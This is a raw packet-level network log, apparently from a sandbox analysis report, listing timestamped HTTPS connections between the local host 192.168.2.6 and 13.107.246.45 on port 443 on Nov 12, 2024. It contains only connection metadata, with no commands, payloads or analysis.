                                                        Nov 12, 2024 16:27:13.067570925 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.067581892 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.067588091 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.070843935 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.070888042 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.070960045 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.071125031 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.071137905 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.361804008 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.362415075 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.362451077 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.362951994 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.362961054 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.380153894 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.380666971 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.380691051 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.381151915 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.381158113 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.494246006 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.494312048 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.494396925 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.494599104 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.494635105 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.494654894 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.494679928 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.498027086 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.498063087 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.498123884 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.498289108 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.498297930 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.512417078 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.512509108 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.512551069 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.512710094 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.512722969 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.512732983 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.512737989 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.515130043 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.515167952 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.515268087 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.515408993 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.515423059 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.629497051 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.630151033 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.630183935 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.630779028 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.630786896 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.768981934 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.769040108 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.769383907 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.769741058 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.769741058 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.769757032 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.769766092 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.776722908 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.776762009 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.776899099 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.777479887 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.777494907 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.803368092 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.804152966 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.804181099 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.808197975 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.808203936 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.935270071 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.935343981 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.936301947 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.936301947 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.936371088 CET49825443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.936383009 CET4434982513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.940571070 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.940603018 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.944292068 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.944593906 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.944610119 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.012775898 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.013492107 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.013519049 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.016226053 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.016232967 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.235526085 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.236462116 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.236479044 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.238213062 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.238219023 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.254297018 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.254935026 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.254959106 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.258193016 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.258199930 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.369246960 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.369431019 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.369688988 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.372216940 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.372216940 CET49826443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.372236967 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.372246027 CET4434982613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.384581089 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.385086060 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.386389017 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.396194935 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.396239996 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.396430969 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.406744957 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.406744957 CET49827443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.406760931 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.406773090 CET4434982713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.432837009 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.432868958 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.436470985 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.436507940 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.438332081 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.442240000 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.442256927 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.496576071 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.497112036 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.497133017 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.498219013 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.498224020 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.624181032 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.624259949 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.624316931 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.624530077 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.624545097 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.624583006 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.624588966 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.627661943 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.627702951 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.627810955 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.627926111 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.627938032 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.628185987 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.628236055 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.628282070 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.628396988 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.628412962 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.628423929 CET49828443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.628428936 CET4434982813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.630583048 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.630613089 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.630678892 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.630796909 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.630810022 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.682876110 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.683382034 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.683408022 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.683907032 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.683912992 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.813837051 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.814183950 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.814254999 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.814291000 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.814305067 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.814315081 CET49829443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.814320087 CET4434982913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.817384958 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.817419052 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:14.817543030 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.817732096 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:14.817739964 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.165714979 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.170675993 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.170690060 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.171823978 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.171830893 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.178427935 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.179236889 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.179253101 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.180715084 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.180720091 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.308762074 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.308782101 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.308835030 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.308841944 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.308890104 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.315706015 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.315920115 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.315963984 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.374496937 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.375519037 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.415330887 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.415343046 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.456814051 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.456820011 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.458280087 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.458283901 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.459245920 CET49831443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.459254980 CET4434983113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.586105108 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.586324930 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.586754084 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.588234901 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.598175049 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.598202944 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.598216057 CET49830443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.598222017 CET4434983013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.605798960 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.605811119 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.605844021 CET49833443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.605849028 CET4434983313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.628814936 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.628843069 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.634067059 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.636476994 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.636482000 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.644124031 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.644129038 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.648185015 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.648189068 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.723112106 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.723143101 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.723215103 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.725528955 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.725543976 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.727319002 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.727344990 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.727447033 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.727735996 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.727754116 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.729520082 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.729548931 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.729758024 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.729907036 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.729921103 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.767143011 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.767225981 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.767288923 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.767608881 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.767626047 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.767635107 CET49832443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.767642021 CET4434983213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.771837950 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.771848917 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.772119999 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.772370100 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.772381067 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.784326077 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.784346104 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.784399986 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.784414053 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.784648895 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.784688950 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.786634922 CET49834443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.786645889 CET4434983413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.807323933 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.807337999 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:15.807657957 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.809165955 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:15.809180021 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.450211048 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.450803041 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.450818062 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.451337099 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.451342106 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.470875978 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.471319914 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.471343040 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.471745014 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.471750021 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.473537922 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.473839045 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.473850965 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.474236965 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.474242926 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.538548946 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.538863897 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.538875103 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.539283991 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.539288998 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579099894 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579118013 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579199076 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.579209089 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579365015 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.579441071 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579488039 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579569101 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.579639912 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.579648018 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.579659939 CET49835443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.579664946 CET4434983513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.584496975 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.584508896 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.584573984 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.584865093 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.584875107 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.619271994 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.619328976 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.619383097 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.619590044 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.619604111 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.619621038 CET49837443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.619626045 CET4434983713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620100021 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620122910 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620168924 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.620178938 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620208025 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620460033 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.620636940 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.620644093 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.620676994 CET49836443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.620680094 CET4434983613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.623188972 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623226881 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.623300076 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623517990 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623528957 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.623694897 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623707056 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.623796940 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623953104 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.623964071 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.668884993 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.669003010 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.669068098 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.669332981 CET49839443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.669337988 CET4434983913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.672638893 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.672655106 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:16.672725916 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.672910929 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:16.672920942 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.197043896 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.197969913 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.197988033 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.199626923 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.199634075 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.327709913 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.327780962 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.327991009 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.328494072 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.328501940 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.328512907 CET49838443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.328516960 CET4434983813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.333482027 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.333514929 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.333590031 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.333914042 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.333928108 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.353472948 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.353914022 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.353929996 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.354811907 CET49840443192.168.2.613.107.246.45
